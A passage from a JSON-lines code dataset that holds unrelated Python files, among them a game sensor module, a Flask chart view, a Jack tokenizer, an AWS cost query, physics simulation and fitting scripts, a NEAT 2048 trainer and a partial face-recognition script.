{}\r\n\t\tcontact_ids = set()\r\n\t\tfor c in computer.sensor_contacts:\r\n\t\t\tcontact_objects[c.object] = c\r\n\t\t\tcontact_ids.add(c.id)\r\n\t\tstrength = self.strength_adjusted\r\n\t\tfor obj in in_range:\r\n\t\t\tif not obj.in_space or obj is self.ship:\r\n\t\t\t\tcontinue\r\n\t\t\ttarget_dd_engaged = False\r\n\t\t\tif isinstance(obj, space_objects.Ship):\r\n\t\t\t\ttarget_dd_engaged = obj.has_dd_engaged\r\n\t\t\tif dd_engaged != target_dd_engaged and not self.dimensional:\r\n\t\t\t\tcontinue\r\n\t\t\tdiff_vector = obj.location - self.ship.location\r\n\t\t\tdistance = diff_vector.length\r\n\t\t\tif distance == 0:\r\n\t\t\t\tdetail = 100.0\r\n\t\t\telse:\r\n\t\t\t\tdistance /= 100000\r\n\t\t\t\tdetail = obj.size**2 * strength * (self.current_power / self.optimal_power) * local_nebula_effect\r\n\t\t\t\tif hasattr(obj, 'power_output') and obj.power_output > 1.0:\r\n\t\t\t\t\tdetail *= (obj.power_output / 1000)\r\n\t\t\t\tdetail /= distance ** 3\r\n\t\t\t\tdetail = sqrt(sqrt(detail))\r\n\t\t\t\tdistance *= 1000000.0\r\n\t\t\t\tif detail < 1.0:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tdetail *= 
calc_nebula_effect(obj)\r\n\t\t\t\tif detail < 1.0:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif detail > 100.0:\r\n\t\t\t\t\tdetail = 100.0\r\n\t\t\tcontact_found = False\r\n\t\t\tcontact = contact_objects.get(obj)\r\n\t\t\tif contact is not None:\r\n\t\t\t\tcontact_found = True\r\n\t\t\t\tif contact.refreshed:\r\n\t\t\t\t\tif contact.detail > detail:\r\n\t\t\t\t\t\tcontact.detail = detail\r\n\t\t\t\t\t\tcontact.diff_vector = diff_vector\r\n\t\t\t\tcontact.refreshed = True\r\n\t\t\t\tcontact.detail = detail\r\n\t\t\t\tcontact.diff_vector = diff_vector\r\n\t\t\tif contact_found:\r\n\t\t\t\tcontinue\r\n\t\t\tnew_contact = SensorContact(object=obj, detail=detail, diff_vector=diff_vector, refreshed=True)\r\n\t\t\tid_used = True\r\n\t\t\twhile id_used:\r\n\t\t\t\tnew_contact.id = randint(1000, 9999)\r\n\t\t\t\tid_used = new_contact.id in contact_ids\r\n\t\t\tcontact_ids.add(new_contact.id)\r\n\t\t\tcomputer.sensor_contacts.append(new_contact)\r\n\t\t\tif isinstance(obj, space_objects.Missile):\r\n\t\t\t\tself.ship.notify_consoles_formatted(\"Sensors\", \"Missile! Contact %d\" % new_contact.id)\r\n\t\t\telse:\r\n\t\t\t\tself.ship.notify_consoles_formatted(\"Sensors\", \"New contact %d\" % new_contact.id)\r\n\t\t\tcomputer.event_sensor_contact_appeared(contact=new_contact)\r\n","sub_path":"pyspace/systems/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"137219974","text":"from skillsmatrixprofile import app\nfrom flask import jsonify, redirect, render_template, request, url_for\nimport simplejson\nfrom google.appengine.api import users\n\n@app.route(\"/\")\ndef index():\n return redirect(url_for(\"view_chart\"))\n\n@app.route('/update_chart', methods = ['POST', 'GET'])\ndef update_chart():\n name = request.form['name']\n skill_names = request.form.getlist('skill_name')\n skill_rating = string_to_int_list(request.form.getlist('skill_rating'))\n skill_years = string_to_int_list(request.form.getlist('skill_years'))\n dict = {}\n dict['chart'] = { \"renderTo\": \"chart-container-1\", \"defaultSeriesType\": \"bar\" }\n dict['title'] = { \"text\": name }\n dict['xAxis'] = { \"categories\": skill_names }\n dict['yAxis'] = { \"title\": { \"text\": \"Skill Level / Years of Experience\" }, \"allowDecimals\": False, }\n dict['series'] = [\n {\n \"name\": \"Skill Level\",\n \"data\": skill_rating },\n {\n \"name\": \"Years of Experience\",\n \"data\": skill_years\n }\n ]\n return jsonify(result=dict)\n\n@app.route(\"/chart\")\ndef view_chart():\n return render_template(\"chart.html\")\n\ndef string_to_int_list(strings):\n result = []\n for s in strings:\n result.append(int(s))\n return result\n","sub_path":"skillsmatrixprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"589137857","text":"import string\nimport abc\n\n\nclass Token:\n KEYWORDS = set(\n [\n \"class\",\n \"constructor\",\n \"function\",\n \"method\",\n \"field\",\n \"static\",\n \"var\",\n \"int\",\n \"char\",\n \"boolean\",\n \"void\",\n \"true\",\n \"false\",\n \"null\",\n \"this\",\n \"let\",\n \"do\",\n \"if\",\n \"else\",\n \"while\",\n \"return\",\n ]\n )\n\n SYMBOLS = set(\n [\n \"{\",\n \"}\",\n \"(\",\n \")\",\n \"[\",\n \"]\",\n \".\",\n \",\",\n \";\",\n \"+\",\n \"-\",\n \"*\",\n \"/\",\n \"&\",\n \"|\",\n \"<\",\n \">\",\n \"=\",\n \"~\",\n ]\n )\n\n @staticmethod\n def 
create(token_str):\n        if token_str in Token.KEYWORDS:\n            return Keyword(token_str)\n        elif token_str in Token.SYMBOLS:\n            return Symbol(token_str)\n        elif all([d in string.digits for d in token_str]):\n            return IntegerConstant(token_str)\n        elif token_str[0] == '\"' and token_str[-1] == '\"':\n            return StringConstant(token_str[1:-1])\n        else:\n            return Identifier(token_str)\n\n    def __init__(self):\n        self.name = \"Token\"\n        self.val = \"TokenValue\"\n        self.tab_size = 2\n\n    @abc.abstractmethod\n    def __repr__(self):\n        return f\"{self.name}({self.val})\"\n\n\nclass Keyword(Token):\n    def __init__(self, val):\n        super(Keyword, self).__init__()\n        self.name = \"Keyword\"\n        self.val = val\n\n    def __eq__(self, other) -> bool:\n        if isinstance(other, Keyword):\n            return self.val == other.val\n\n    def to_xml(self, lvl=0):\n        return f\"{' ' * self.tab_size * lvl}<keyword> {self.val} </keyword>\"\n\n\nclass Symbol(Token):\n    def __init__(self, val):\n        super(Symbol, self).__init__()\n        self.name = \"Symbol\"\n        self.val = val\n\n    def __eq__(self, other) -> bool:\n        if isinstance(other, Symbol):\n            return self.val == other.val\n\n    def to_xml(self, lvl=0):\n        if self.val == \"<\":\n            return f\"{' ' * self.tab_size * lvl}<symbol> &lt; </symbol>\"\n        elif self.val == \">\":\n            return f\"{' ' * self.tab_size * lvl}<symbol> &gt; </symbol>\"\n        elif self.val == \"&\":\n            return f\"{' ' * self.tab_size * lvl}<symbol> &amp; </symbol>\"\n        else:\n            return f\"{' ' * self.tab_size * lvl}<symbol> {self.val} </symbol>\"\n\n\nclass IntegerConstant(Token):\n    def __init__(self, val: str):\n        super(IntegerConstant, self).__init__()\n        self.name = \"IntegerConstant\"\n        self.val = val\n\n    def __eq__(self, other) -> bool:\n        if isinstance(other, IntegerConstant):\n            return self.val == other.val\n\n    def to_xml(self, lvl=0):\n        return f\"{' ' * self.tab_size * lvl}<integerConstant> {self.val} </integerConstant>\"\n\n\nclass StringConstant(Token):\n    def __init__(self, val):\n        super(StringConstant, self).__init__()\n        self.name = \"StringConstant\"\n        self.val = val\n\n    def __eq__(self, other) -> bool:\n        if isinstance(other, StringConstant):\n            return self.val == other.val\n\n    def to_xml(self, lvl=0):\n        return (\n            f\"{' ' * self.tab_size * lvl}<stringConstant> {self.val} </stringConstant>\"\n        )\n\n\nclass Identifier(Token):\n    def __init__(self, val):\n        super(Identifier, self).__init__()\n        self.name = \"Identifier\"\n        self.val = val\n\n    def __eq__(self, other) -> bool:\n        if isinstance(other, Identifier):\n            return self.val == other.val\n\n    def to_xml(self, lvl=0):\n        return f\"{' ' * self.tab_size * lvl}<identifier> {self.val} </identifier>\"\n","sub_path":"projects/10/syntax_analyzer/lib/jack_token.py","file_name":"jack_token.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"231158584","text":"import boto3\nclient = boto3.client('ce')\n\nresponse = client.get_cost_and_usage(\n    TimePeriod={\n        'Start': '2020-05-01',\n        'End': '2020-05-20'\n    },\n    Granularity='DAILY',\n    Filter={\n        'Or': [\n            {'... recursive ...'},\n        ],\n        'And': [\n            {'... recursive ...'},\n        ],\n        'Not': {'... 
recursive ...'},\n 'Dimensions': {\n \"Key\": \"LINKED_ACCOUNT\",\n \"Values\": [751900335485],\n 'MatchOptions': [\n 'EQUALS',\n ]\n },\n 'CostCategories': {\n 'Key': 'string',\n 'Values': [\n 'string',\n ]\n }\n },\n Metrics=[\n 'string',\n ],\n GroupBy=[\n {\n 'Type': 'DIMENSION',\n 'Key': 'string'\n },\n ],\n NextPageToken='string'\n)\n'''result = client.get_cost_and_usage(\n TimePeriod = {\n 'Start': '01-05-2020',\n 'End': '20-05-2020'\n },\n Granularity = 'DAILY',\n Filter = {\n \"And\": [{\n \"Dimensions\": {\n \"Key\": \"LINKED_ACCOUNT\",\n \"Values\": [751900335485]\n }\n }, {\n \"Not\": {\n \"Dimensions\": {\n \"Key\": \"RECORD_TYPE\",\n \"Values\": [\"Credit\", \"Refund\"]\n }\n }\n }]\n },\n Metrics = [\"BlendedCost\"],\n GroupBy = [\n {\n 'Type': 'DIMENSION',\n 'Key': 'SERVICE'\n },\n {\n 'Type': 'DIMENSION',\n 'Key': 'USAGE_TYPE'\n }\n ]\n)\n'''","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"555079141","text":"from human import Human\n\nfrom random import randint\n\nclass Hero(Human):\n\t\n\tdef __init__(self, name, house):\n\t\tsuper(Hero, self).__init__()\n\t\tself.name = name\n\t\tself.house = house\n\t\tself.home = self._find_home(house)\n\t\tself.location = self.home\n\t\n\tdef _find_home(self, house):\n\t\thomes = {'Stark': 'Winterfell', \n\t\t\t\t'Lannister': 'Casterly Rock', \n\t\t\t\t'Baratheon': \"Storm's End\", \n\t\t\t\t'Tyrell': 'Highgarden', \n\t\t\t\t'Tully': 'Riverrun'}\n\t\t\t\t\n\t\thome = homes[house]\n\t\treturn home\n\t\t\n\tdef attack(self):\n\t\tattack = randint(0, 100)\n\t\treturn attack\n\t\t\n\tdef defend(self):\n\t\tdefend = randint(0, 50)\n\t\treturn defend","sub_path":"ex45/hero.py","file_name":"hero.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"329770085","text":"from datetime import datetime\nfrom itertools import count\nfrom math import ceil, floor\nfrom os import path, makedirs\nfrom scipy.optimize import least_squares\nimport numpy as np\nfrom matplotlib import pyplot as plt, colors, cm\nfrom simu1d import Simulation, run_simulation_opt\nfrom opt_diffusion_1d import make_params_dict\nfrom opt_diffusion_1d import get_exp_time_temp_arrays\nfrom diffusion_1d import PERIMETER, AREA, MIN_X, MAX_X\nfrom diffusion_1d_v3 import explicit_diffusion_simple\n# from diffusion_1d_v2 import implicit_mod_diffusion_simple\n# from diffusion_1d_v2 import implicit_mod2_diffusion_simple\n\n\n# input files\nDATA_FPATHS = [\n # '../../data/temperature data/June 1/Run1_tc1_June1.dat',\n '../../data/temperature data/June 1/Run1_tc2_June1.dat',\n '../../data/temperature data/June 1/Run1_tc3_June1.dat',\n # '../../data/temperature data/June 1/Run1_tc4_June1.dat',\n]\n# output files\nOPT_FPATH = '../results/June 1 - Run 1/params_2tcs.dat'\nSIM_FPATH = '../results/June 1 - Run 1/sim_2tcs.dat'\n\nEXP_X_ARRAY = np.array(sorted([.33 - .01555 - .0725*n for n in [1, 2]]))\n\nMETHOD = explicit_diffusion_simple\nHEATING_ONLY = False\n\nTIME_STEP = .25\nDIM_X = 66 + 1\n\nU_0 = 303.\nU_AMB = 297.\nTHERMAL_CONDUCTIVITY = 125.\nSPECIFIC_HEAT = 380.\nMASS_DENSITY = 8730.\nCONVECTION_COEFF = 1.95\nEMISSIVITY = .01\nPOWER = 15.36216 # set to V^2/15, look in spreadsheet for V\nPOWER2 = -10.\nSTOP_TIME = 900. 
# set to value for run listed in spreadsheet\n\nALL_PARAMS_DICT = dict(\n u_0=U_0,\n u_amb=U_AMB,\n thermal_conductivity=THERMAL_CONDUCTIVITY,\n specific_heat=SPECIFIC_HEAT,\n mass_density=MASS_DENSITY,\n convection_coeff=CONVECTION_COEFF,\n emissivity=EMISSIVITY,\n power=POWER,\n power2=POWER2,\n stop_time=STOP_TIME,\n perimeter=PERIMETER,\n area=AREA,\n)\n\nPARAMS_GUESS_DICT = dict(\n u_0=U_0,\n u_amb=U_AMB,\n thermal_conductivity=THERMAL_CONDUCTIVITY,\n specific_heat=SPECIFIC_HEAT,\n mass_density=MASS_DENSITY,\n convection_coeff=CONVECTION_COEFF,\n emissivity=EMISSIVITY,\n power=POWER,\n power2=POWER2,\n # stop_time=STOP_TIME,\n)\n\nPARAMS_BOUNDS_DICT = dict(\n u_0=(.95*U_0, 1.05*U_0),\n u_amb=(.9*U_AMB, 1.1*U_AMB),\n thermal_conductivity=(.8*THERMAL_CONDUCTIVITY, 1.2*THERMAL_CONDUCTIVITY),\n specific_heat=(.95*SPECIFIC_HEAT, 1.05*SPECIFIC_HEAT),\n mass_density=(.95*MASS_DENSITY, 1.05*MASS_DENSITY),\n convection_coeff=(0., 1000.),\n emissivity=(0., 1.),\n power=(0., POWER),\n power2=(-POWER, 0)\n # stop_time=(STOP_TIME-10, STOP_TIME+10),\n)\n\nALL_PARAMS_DICT.update(PARAMS_GUESS_DICT)\n\n\ndef _first_iteration_plot(\n ax, time_step, exp_temp_array, sim_temp_array, fit_lines):\n num_steps, num_lines = exp_temp_array.shape\n time_array = np.array([time_step * x for x in range(num_steps)])\n # get colors\n c_norm = colors.Normalize(vmin=0, vmax=num_lines-1)\n scalar_map = cm.ScalarMappable(norm=c_norm, cmap=plt.get_cmap('jet'))\n for exp_line, sim_line, i in zip(\n exp_temp_array.T, sim_temp_array.T, count()):\n clr = scalar_map.to_rgba(i)\n ax.plot(\n time_array, exp_line, '-', color=clr,\n label='TC {} data'.format(i+1)\n )\n line, = ax.plot(\n time_array, sim_line, '--', color=clr,\n )\n fit_lines.append(line)\n plt.xlabel('Time (s)')\n plt.ylabel('Temperature (K)')\n plt.title('Temperature vs Time Data for Simulation')\n plt.legend()\n plt.show(block=False)\n\n\ndef _update_iteration_plot(fig, fit_lines, sim_temp_array):\n for line, col in zip(fit_lines, sim_temp_array.T):\n line.set_ydata(col)\n fig.canvas.draw()\n\n\ndef _lsq_func_simp(\n params_arr, const_params_dict, variable_params_keys,\n exp_time_array, exp_x_array, exp_temp_array,\n x_array, num_steps, time_step,\n finite_step_method, sim_fpath, iteration_fn,\n figure=None, ax=None, fit_lines=None,\n):\n params_dict = make_params_dict(\n params_arr=params_arr, const_params_dict=const_params_dict,\n variable_params_keys=variable_params_keys\n )\n t_0 = params_dict['u_0']\n iter_num = next(iteration_fn)\n num_params = len(params_arr) + 1\n sub_iter = iter_num % num_params\n print('\\nIteration {}-{}'.format(\n floor(iter_num/num_params), sub_iter))\n i = 0\n for k, v in sorted(params_dict.items()):\n if k in variable_params_keys:\n i += 1\n if i == sub_iter:\n print('\\033[96m *{:24}: {}\\033[0m'.format(k, v))\n elif 0 == sub_iter:\n print('\\033[96m {:24}: {}\\033[0m'.format(k, v))\n else:\n print(' {:24}: {}'.format(k, v))\n del params_dict['u_0']\n sim = Simulation(\n time_step=time_step, x_array=x_array, t_0=t_0,\n finite_step_method=finite_step_method, params_dict=params_dict,\n boundary_conditions=None,\n )\n sim_temp_array = run_simulation_opt(\n simulation=sim, num_steps=num_steps, fpath=sim_fpath,\n exp_time_array=exp_time_array, exp_x_array=exp_x_array,\n )\n residuals = (sim_temp_array.flatten() - exp_temp_array.flatten())\n # return residuals\n m, n = sim_temp_array.shape\n # diff_arr = residuals * np.array(\n # [np.exp(-floor(i/n)/(m-1)) for i in range(m*n)])\n diff_arr = residuals\n print(' Sum of squares per point 
(res) = {}'.format(\n np.dot(residuals, residuals)/(m*n)))\n print(' Sum of squares per point (opt) = {}'.format(\n np.dot(diff_arr, diff_arr)/(m*n)))\n if iter_num == 0:\n _first_iteration_plot(\n ax=ax, time_step=time_step,\n exp_temp_array=exp_temp_array, sim_temp_array=sim_temp_array,\n fit_lines=fit_lines,\n )\n else:\n _update_iteration_plot(\n fig=figure, fit_lines=fit_lines, sim_temp_array=sim_temp_array)\n return diff_arr\n\n\ndef optimize_diffusion_simp_parameters_with_bounds(\n params_guess_dict, params_bounds_dict, const_params_dict,\n exp_time_array, exp_x_array, exp_temp_array,\n x_array, num_steps, time_step, finite_step_method, sim_fpath,\n lsq_fn=_lsq_func_simp,\n):\n params_guess = np.array([v for k, v in sorted(params_guess_dict.items())])\n if params_bounds_dict is None:\n bounds = None\n else:\n pgi = sorted(params_bounds_dict.items())\n lower_bounds = np.array([v[0] for k, v in pgi])\n upper_bounds = np.array([v[1] for k, v in pgi])\n bounds = (lower_bounds, upper_bounds)\n iter_fn = count()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n fit_lines = list()\n return least_squares(\n fun=lsq_fn, x0=params_guess, bounds=bounds, verbose=2,\n args=(\n const_params_dict, params_guess_dict.keys(),\n exp_time_array, exp_x_array, exp_temp_array,\n x_array, num_steps, time_step,\n finite_step_method, sim_fpath, iter_fn, fig, ax, fit_lines\n ),\n )\n\n\n# script\nif __name__ == '__main__':\n # make results directories\n opt_dpath = path.split(OPT_FPATH)[0]\n sim_dpath = path.split(SIM_FPATH)[0]\n if not path.exists(opt_dpath):\n makedirs(opt_dpath)\n if not path.exists(sim_dpath):\n makedirs(sim_dpath)\n # determine which parameters to hold constant\n const_keys = filter(\n lambda k: k not in PARAMS_GUESS_DICT, ALL_PARAMS_DICT.keys())\n const_params_dict0 = {k: ALL_PARAMS_DICT[k] for k in const_keys}\n # get experimental arrays\n exp_time_array0, exp_temp_array0 = get_exp_time_temp_arrays(\n dat_fpaths_list=DATA_FPATHS\n )\n # find index of last time before stop time\n if HEATING_ONLY:\n for time, ii in zip(exp_time_array0, range(len(exp_time_array0))):\n if time > STOP_TIME:\n exp_time_array0 = exp_time_array0[:ii]\n exp_temp_array0 = exp_temp_array0[:ii]\n break\n # get num_steps\n num_steps0 = ceil(exp_time_array0[-1] / TIME_STEP)\n print(num_steps0)\n # run optimization\n result = optimize_diffusion_simp_parameters_with_bounds(\n params_guess_dict=PARAMS_GUESS_DICT,\n params_bounds_dict=PARAMS_BOUNDS_DICT,\n const_params_dict=const_params_dict0,\n exp_time_array=exp_time_array0,\n exp_x_array=EXP_X_ARRAY,\n exp_temp_array=exp_temp_array0,\n x_array=np.linspace(MIN_X, MAX_X, DIM_X),\n num_steps=num_steps0, time_step=TIME_STEP,\n finite_step_method=METHOD,\n sim_fpath=SIM_FPATH,\n )\n # write results file\n params_array = result.x\n with open(OPT_FPATH, 'w') as fw:\n fw.write(str(datetime.now()) + '\\n')\n fw.write('\\n')\n fw.write('Optimization of 1-dimensional parameters\\n')\n fw.write('\\n')\n fw.write('Optimized parameters:\\n')\n for param, val in zip(sorted(PARAMS_GUESS_DICT.keys()), params_array):\n fw.write(' {:24}= {}\\n'.format(param, val))\n fw.write('\\n')\n for name, item in result.items():\n if name == 'x':\n continue\n fw.write('{}:\\n'.format(name))\n fw.write('{}\\n'.format(item))\n fw.write('\\n')\n","sub_path":"enph257/simulations/src/opt_diffusion_1d_v2_June1_Run1.py","file_name":"opt_diffusion_1d_v2_June1_Run1.py","file_ext":"py","file_size_in_byte":9116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 
+{"seq_id":"576933342","text":"import numpy\nimport bornagain as ba\nfrom bornagain import deg, angstrom, nm, kvector_t\nfrom matplotlib import pyplot as plt\nimport matplotlib\nmatplotlib.rcParams['image.cmap'] = 'jet'\n\n\ndef get_sample():\n # Defining Materials\n material_1 = ba.HomogeneousMaterial(\"example01_Air\", 0.0, 0.0)\n material_2 = ba.HomogeneousMaterial(\"Au\", 3.53665637e-05, 2.9383311e-06)\n material_3 = ba.HomogeneousMaterial(\"Si\", 5.73327e-06, 1.006366e-07)\n\n # Defining Layers\n layer_1 = ba.Layer(material_1)\n layer_2 = ba.Layer(material_3)\n\n # Defining Form Factors\n formFactor_1 = ba.FormFactorTruncatedSphere(159.0*nm, 244.0*nm, 106.0*nm)\n\n # Defining Particles\n particle_1 = ba.Particle(material_2, formFactor_1)\n particle_1_position = kvector_t(0.0*nm, 0.0*nm, 333.0*nm)\n particle_1.setPosition(particle_1_position)\n\n # Defining Particle Layouts and adding Particles\n layout_1 = ba.ParticleLayout()\n layout_1.addParticle(particle_1, 1.0)\n layout_1.setTotalParticleSurfaceDensity(0.01)\n\n # Adding layouts to layers\n layer_1.addLayout(layout_1)\n\n # Defining Multilayers\n multiLayer_1 = ba.MultiLayer()\n multiLayer_1.addLayer(layer_1)\n multiLayer_1.addLayer(layer_2)\n return multiLayer_1\n\n\ndef get_simulation():\n simulation = ba.GISASSimulation()\n \n detector = ba.RectangularDetector(981, 168.732, 1043, 179.396)\n detector.setPerpendicularToDirectBeam(3530.0, 104.558, 39.422)\n simulation.setDetector(detector)\n \n simulation.setDetectorResolutionFunction(ba.ResolutionFunction2DGaussian(0.043, 0.043))\n simulation.setBeamParameters(0.1341*nm, 0.2*deg, 0.0*deg)\n simulation.setBeamIntensity(5.0e+06)\n simulation.setTerminalProgressMonitor()\n simulation.setRegionOfInterest(40.0, 50.0, 160.0, 170.0)\n return simulation\n\n\ndef run_simulation():\n sample = get_sample()\n simulation = get_simulation()\n simulation.setSample(sample)\n simulation.runSimulation()\n return simulation.result()\n\n\ndef plot(result):\n plt.figure(figsize=(12.80, 10.24))\n plt.subplot()\n ba.plot_colormap(result, units=ba.AxesUnits.QSPACE, title=\"Q-space\",\n xlabel=r'$Q_{y} [1/nm]$', ylabel=r'$Q_{z} [1/nm]$', zmin=0.2, zmax=1e+5)\n plt.savefig('cup.jpg')\n\n\nif __name__ == '__main__':\n result = run_simulation()\n plot(result)","sub_path":"galaxi/Cap.py","file_name":"Cap.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"113927878","text":"import neat\nimport game\nimport random\nimport json\n\nSAVE_FILE = './save.json'\nNUM_GENERATIONS = 10000\nSAVE_BEST = 100\n\n\nclass NeatGame:\n def __init__(self, genome: neat.Genome):\n self.genome = genome\n self.g = game.Game()\n\n def move(self):\n outputs = {i: weight for i, weight in enumerate(\n self.genome.feedforward(self._get_inputs()))}\n\n for i, weight in sorted(outputs.items(), key=lambda x: x[1], reverse=True):\n if self.g.check_available(i):\n self.g.move(i)\n break\n\n def alive(self):\n return not self.g.game_over\n\n def assign_fitness(self):\n self.genome.fitness = self.g.score\n\n def fitness(self):\n return self.genome.fitness\n\n def print_board(self):\n self.g.print_board()\n\n def _get_inputs(self):\n return [i/32768 for i in self.g.flattened_board()]\n\n\nif __name__ == '__main__':\n n = neat.NEAT(16, 4)\n i = 0\n recent_best_genes = []\n highest_highest_fitness = 0\n highest_generation_fitness = 0\n while i < NUM_GENERATIONS:\n neat_games = [NeatGame(genome) for genome in n.genomes()]\n highest_fitness = 0\n for 
g in neat_games:\n while g.alive():\n g.move()\n g.assign_fitness()\n highest_fitness = max(highest_fitness, g.fitness())\n generation_fitness = n.generation_fitness\n print(\n f'Generation: {i} HighFitness: {highest_fitness} GenerationFitness: {generation_fitness}')\n if highest_fitness > highest_highest_fitness:\n highest_highest_fitness = highest_fitness\n recent_best_genes.append({\n 'generation': i,\n 'best_genome': sorted(n.genomes(), key=lambda genome: genome.fitness)[-1].as_list(),\n 'highest_fitness': highest_fitness,\n 'generation_fitness': generation_fitness\n })\n if len(recent_best_genes) > SAVE_BEST:\n recent_best_genes.pop(0)\n i += 1\n n.next_generation()\n\n # test and save\n # last_games = []\n # for genome in n.genomes():\n # g = NeatGame(genome)\n # while g.alive():\n # g.move()\n # g.assign_fitness()\n # last_games.append({\n # 'genome': g.genome.as_list(),\n # 'score': g.fitness()\n # })\n\n # last_games.sort(key=lambda g: g['score'])\n\n with open(SAVE_FILE, 'w') as save_file:\n save_file.write(json.dumps(recent_best_genes))\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"255061058","text":"import os # 디렉토리 경로 호출 용도\r\nimport cv2 # 이미지 파일 불러올 때 사용\r\nimport numpy as np # 다양한 행렬 연산 (데이터 처리) 용도\r\nfrom sklearn.preprocessing import LabelEncoder\r\n# 데이터 전처리 (문자로된 폴더 리스트를 숫자형 array로 변환)\r\nfrom sklearn.preprocessing import OneHotEncoder\r\n# one-hot-encoding을 위해 OneHotEncoder 함수를 불러옴\r\nfrom numpy import array # 리스트를 array형태로 만들떄 사용하는 함수\r\nimport tensorflow as tf\r\nimport face_recognition\r\n\r\nIMAGE_SIZE = 64\r\nfont = cv2.FONT_HERSHEY_SIMPLEX\r\nTRAIN_DIR = \"./gdrive/My Drive/train_data/\"\r\n\r\ntrain_folder_list = array(os.listdir(TRAIN_DIR))\r\n# print(train_folder_list)\r\n# ['elijah' 'taeim']\r\n\r\ntrain_input = []\r\ntrain_label = []\r\n\r\nlabel_encoder = LabelEncoder() # LabelEncoder Class 호출\r\n\r\n# 문자열로 구성된 train_folder_list를 숫자형 리스트로 변환\r\ninteger_encoded = label_encoder.fit_transform(train_folder_list) # 계수 추정과 자료 변환을 동시에\r\n# print(integer_encoded)\r\n# [0 1]\r\n\r\nonehot_encoder = OneHotEncoder(sparse=False)\r\n# print(onehot_encoder)\r\n# OneHotEncoder(categorical_features=None, categories=None,dtype=,\r\n# handle_unknown='error', n_values=None, sparse=False)\r\n\r\ninteger_encoded = integer_encoded.reshape(len(integer_encoded), 1)\r\n# OneHotEncoder를 사용하기 위해 integer_encoded의 shape을 (2,)에서 (2,1)로 변환\r\n# print(integer_encoded)\r\n# [[0]\r\n# [1]]\r\n\r\nonehot_encoded = onehot_encoder.fit_transform(integer_encoded)\r\n# OneHotEncoder를 사용하여 integer_encoded를 다음과 같이 변환하여 onehot_encoded 변수에 저장\r\n# print(onehot_encoded)\r\n# [[1. 0.]\r\n# [0. 
1.]]\r\n\r\nfor index in range(len(train_folder_list)):\r\n path = os.path.join(TRAIN_DIR, train_folder_list[index])\r\n path = path + '/'\r\n img_list = os.listdir(path)\r\n print('train_img_list:', img_list)\r\n for img in img_list:\r\n img_path = os.path.join(path, img)\r\n img = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\r\n train_input.append([np.array(img)]) # 이미지를 array 형태로 바꾸고 리스트에 넣음\r\n train_label.append([np.array(onehot_encoded[index])])\r\n\r\n\r\n# print(np.shape(train_input[0])) # (1, 64, 64)\r\ntrain_input = np.reshape(train_input, (-1, 4096))\r\n# print(np.shape(train_input[0])) # (4096,)\r\n# print(train_input.shape) # (8320, 4096)\r\n\r\n\r\n# print(np.shape(train_label[0])) # (1, 2)\r\ntrain_label = np.reshape(train_label, (-1, 2))\r\n# print(np.shape(train_label[0])) # (2,)\r\n# print(train_label.shape) # (8320, 2)\r\n\r\n\r\ntrain_input = np.array(train_input).astype(np.float32)\r\ntrain_label = np.array(train_label).astype(np.float32)\r\n\r\n\r\nTEST_DIR = \"./gdrive/My Drive/test_data/\"\r\ntest_folder_list = array(os.listdir(TEST_DIR))\r\n\r\ntest_input = []\r\ntest_label = []\r\n\r\nlabel_encoder = LabelEncoder()\r\ninteger_encoded = label_encoder.fit_transform(test_folder_list)\r\n\r\nonehot_encoder = OneHotEncoder(sparse=False)\r\ninteger_encoded = integer_encoded.reshape(len(integer_encoded), 1)\r\nonehot_encoded = onehot_encoder.fit_transform(integer_encoded)\r\n\r\n\r\nimg_save_list = []\r\ntop_list = []\r\nright_list = []\r\nbottom_list = []\r\nleft_list = []\r\n\r\nfor index in range(len(test_folder_list)):\r\n path = os.path.join(TEST_DIR, test_folder_list[index])\r\n path = path + '/'\r\n img_list = os.listdir(path)\r\n print('test_img_list:', img_list)\r\n\r\n for img in img_list:\r\n img_path = os.path.join(path, img)\r\n img = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\r\n img_save_list.append(img)\r\n\r\n face_locations = face_recognition.face_locations(img)\r\n\r\n for j, face_location in enumerate(face_locations):\r\n top, right, bottom, left = face_location\r\n\r\n top_list.append(top)\r\n right_list.append(right)\r\n bottom_list.append(bottom)\r\n left_list.append(left)\r\n\r\n face_img = img[top:bottom, left:right]\r\n resized_img = cv2.resize(face_img, dsize=(IMAGE_SIZE, IMAGE_SIZE), interpolation=cv2.INTER_AREA)\r\n\r\n test_input.append([np.array(resized_img)]) # (60, 1, 64, 64)\r\n test_label.append([np.array(onehot_encoded[index])]) # (60, 1, 2)\r\n\r\ntest_input = np.reshape(test_input, (-1, 4096)) # (60, 4096)\r\ntest_label = np.reshape(test_label, (-1, 2)) # (60, 2)\r\ntest_input = np.array(test_input).astype(np.float32)\r\ntest_label = np.array(test_label).astype(np.float32)\r\n\r\n\r\n# set hyper parameters\r\nbatch_size = 128\r\nlearning_rate = 0.001\r\ntraining_epochs = 50\r\n\r\n# set random_seed\r\ntf.set_random_seed(1)\r\n\r\n\r\n# input placeholder of batch normalization\r\nbatch_prob = tf.placeholder(tf.bool)\r\nkeep_prob = tf.placeholder(tf.float32)\r\n\r\n\r\n# input placeholders\r\nX = tf.placeholder(dtype=tf.float32, shape=[None, 4096]) # 64x64=4096 [None, 4096] 